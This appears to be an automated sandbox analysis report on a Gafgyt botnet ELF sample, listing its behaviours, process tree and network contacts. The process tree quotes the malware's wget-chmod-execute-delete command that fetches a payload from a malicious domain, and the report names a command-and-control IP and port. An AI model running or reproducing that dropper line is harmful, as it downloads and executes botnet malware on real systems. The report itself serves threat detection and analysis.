Analysis Overview
SHA256
a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf
Threat Level: Known bad
The file a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf was found to be: Known bad.
Malicious Activity Summary
Gafgyt family
Detected Gafgyt variant
Changes its process name
Executes dropped EXE
Modifies Watchdog functionality
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 01:17
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Gafgyt family
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 01:17
Reported
2024-04-02 01:20
Platform
ubuntu2004-amd64-20240221-en
Max time kernel
146s
Max time network
140s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/..... | /tmp/..... | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /dev/watchdog | N/A | N/A |
| File opened for modification | /dev/misc/watchdog | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/net/route | /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/net/route | /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/..... | /usr/bin/wget | N/A |
Processes
/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf
[/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/usr/bin/chmod
[chmod 777 .....]
/tmp/.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/usr/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 224.0.0.251:5353 | N/A | udp |
| MD | 85.239.33.129:666 | N/A | tcp |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 151.101.194.49:443 | cdn.fwupd.org | tcp |
| US | 1.1.1.1:53 | _http._tcp.security.ubuntu.com | udp |
| US | 1.1.1.1:53 | _https._tcp.deb.nodesource.com | udp |
| US | 1.1.1.1:53 | _http._tcp.nl.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | deb.nodesource.com | udp |
| US | 1.1.1.1:53 | deb.nodesource.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | nl.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | nl.archive.ubuntu.com | udp |
| US | 91.189.91.82:80 | security.ubuntu.com | tcp |
| US | 104.22.4.26:443 | deb.nodesource.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| US | 151.101.194.49:443 | cdn.fwupd.org | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| US | 1.1.1.1:53 | _https._tcp.motd.ubuntu.com | udp |
| US | 1.1.1.1:53 | motd.ubuntu.com | udp |
| US | 1.1.1.1:53 | motd.ubuntu.com | udp |
| IE | 34.254.182.186:443 | motd.ubuntu.com | tcp |
| US | 1.1.1.1:53 | _https._tcp.esm.ubuntu.com | udp |
| US | 1.1.1.1:53 | esm.ubuntu.com | udp |
| US | 1.1.1.1:53 | esm.ubuntu.com | udp |
| US | 91.189.91.46:443 | esm.ubuntu.com | tcp |
| IE | 54.171.230.55:443 | motd.ubuntu.com | tcp |
| IE | 54.217.10.153:443 | motd.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| IE | 34.243.160.129:443 | motd.ubuntu.com | tcp |
| IE | 54.247.62.1:443 | motd.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| MD | 85.239.33.129:666 | N/A | tcp |
| MD | 85.239.33.129:666 | N/A | tcp |
| MD | 85.239.33.129:666 | N/A | tcp |
| MD | 85.239.33.129:666 | N/A | tcp |
| MD | 85.239.33.129:666 | N/A | tcp |
| MD | 85.239.33.129:666 | N/A | tcp |
| MD | 85.239.33.129:666 | N/A | tcp |
| MD | 85.239.33.129:666 | N/A | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| MD | 85.239.33.129:666 | N/A | tcp |